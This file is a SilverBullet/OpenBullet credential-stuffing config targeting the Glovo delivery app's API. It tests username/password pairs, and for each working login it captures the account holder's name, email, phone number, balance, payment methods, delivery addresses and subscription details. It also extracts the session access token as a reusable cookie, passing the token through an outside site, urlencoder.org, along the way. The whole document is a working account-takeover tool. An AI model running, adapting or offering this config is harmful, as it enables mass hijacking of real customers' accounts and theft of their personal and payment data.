[SETTINGS]
{
  "Name": "Glovo Cookie Full Capture",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-31T19:29:47.4484085+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "glovo new maybe work",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#POST REQUEST POST "https://api.glovoapp.com/oauth/token" 
  CONTENT "{\"grantType\":\"password\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\":\"Authentication failed:" 
    KEY "bad credentials\",\"" 
    KEY "Authentication failed." 
  KEYCHAIN Success OR 
    KEY "{\"accessToken\":\"" 
    KEY "\",\"twoFactorToken\":null" 

#TK PARSE "<SOURCE>" LR "{\"accessToken\":\"" "\"" -> VAR "TK" 

#GET_PROFILE REQUEST GET "https://api.glovoapp.com/v3/me" 
  
  HEADER "Host: api.glovoapp.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-GB,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Glovo-API-Version: 14" 
  HEADER "Glovo-App-Platform: web" 
  HEADER "Glovo-App-Version: 7" 
  HEADER "Glovo-App-Type: customer" 
  HEADER "Glovo-Language-Code: en" 
  HEADER "Glovo-Device-Id: 166495414" 
  HEADER "Glovo-App-Development-State: Production" 
  HEADER "Origin: https://glovoapp.com" 
  HEADER "Authorization: <TK>" 

#id PARSE "<SOURCE>" JSON "id" -> VAR "id" 

#Acc_type PARSE "<SOURCE>" JSON "type" CreateEmpty=FALSE -> CAP "Acc type" 

#name PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "name" 

#email PARSE "<SOURCE>" JSON "email" CreateEmpty=FALSE -> CAP "email" 

#Total_Orders PARSE "<SOURCE>" JSON "deliveredOrdersCount" CreateEmpty=FALSE -> CAP "Total Orders" 

#phone_Number PARSE "<SOURCE>" JSON "phoneNumber" CreateEmpty=FALSE -> CAP "Phone Number" 

#Balance PARSE "<SOURCE>" LR "virtualBalance\":{\"balance\":" "}" CreateEmpty=FALSE -> CAP "Balance" 

#Free_Orders PARSE "<SOURCE>" JSON "freeOrders" CreateEmpty=FALSE -> CAP "Free Orders" 

#Payment_Method PARSE "<SOURCE>" JSON "paymentMethod" CreateEmpty=FALSE -> CAP "Payment Method" 

#GET_PAYMENTS REQUEST GET "https://api.glovoapp.com/v3/payment_methods" 
  
  HEADER "Host: api.glovoapp.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-GB,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Glovo-API-Version: 14" 
  HEADER "Glovo-App-Platform: web" 
  HEADER "Glovo-App-Version: 7" 
  HEADER "Glovo-App-Type: customer" 
  HEADER "Glovo-Language-Code: en" 
  HEADER "Glovo-Device-Id: 166495414" 
  HEADER "Glovo-App-Development-State: Production" 
  HEADER "Origin: https://glovoapp.com" 
  HEADER "Authorization: <TK>" 

#Type_of_Payments PARSE "<SOURCE>" LR "paymentMethods\":[{\"type\":\"" "\"" CreateEmpty=FALSE -> CAP "Type of Payments" 

#Amounts PARSE "<SOURCE>" JSON "maxAmount" CreateEmpty=FALSE -> CAP "Amounts" 

#GET_SUBSCRIPTION REQUEST GET "https://api.glovoapp.com/v3/whats_up" 
  
  HEADER "Host: api.glovoapp.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-GB,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Glovo-API-Version: 14" 
  HEADER "Glovo-App-Platform: web" 
  HEADER "Glovo-App-Version: 7" 
  HEADER "Glovo-App-Type: customer" 
  HEADER "Glovo-Language-Code: en" 
  HEADER "Glovo-Device-Id: 166495414" 
  HEADER "Glovo-App-Development-State: Production" 
  HEADER "Glovo-Delivery-Location-Latitude: 46.4991697" 
  HEADER "Glovo-Delivery-Location-Longitude: 11.3481935" 
  HEADER "Glovo-Delivery-Location-Accuracy: 0" 
  HEADER "Glovo-Delivery-Location-Timestamp: 1609794011117" 
  HEADER "Glovo-Location-City-Code: BZO" 
  HEADER "Origin: https://glovoapp.com" 
  HEADER "Authorization: <TK>" 

#deliveryAddresses PARSE "<SOURCE>" LR "deliveryAddresses\":[" "]" CreateEmpty=FALSE -> CAP "deliveryAddresses" 

#Subscription PARSE "<SOURCE>" JSON "subscribed" CreateEmpty=FALSE -> CAP "Subscription" 

#isTrial PARSE "<SOURCE>" JSON "isTrialEligible" CreateEmpty=FALSE -> CAP "isTrial" 

#POST REQUEST POST "https://api.glovoapp.com/oauth/token" 
  CONTENT "{\"grantType\":\"password\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  COOKIE "\"twoFactorToken\": null,\"expirationTime\":1798103533298" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\":\"Authentication failed:" 
    KEY "bad credentials\",\"" 
    KEY "Authentication failed." 
  KEYCHAIN Success OR 
    KEY "{\"accessToken\":\"" 
    KEY "\",\"twoFactorToken\":null" 

#TK PARSE "<SOURCE>" JSON "" -> VAR "TOK" 

FUNCTION Translate 
  KEY "null}" VALUE "null,\"expirationTime\":1798103533298}" 
  "<TOK>" -> VAR "deez" 

REQUEST POST "https://www.urlencoder.org/" 
  CONTENT "input=<deez>&charset=UTF-8&separator=lf" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "placeholder=\"Result goes here...\" spellcheck=\"false\">" "</textarea>" -> VAR "dez" 

FUNCTION Translate UseVar=TRUE 
  KEY "%7D" VALUE "}" 
  "<dez>" -> VAR "11" 

FUNCTION Translate 
  KEY "%7B" VALUE "{" 
  "<11>" -> CAP "cookie" 

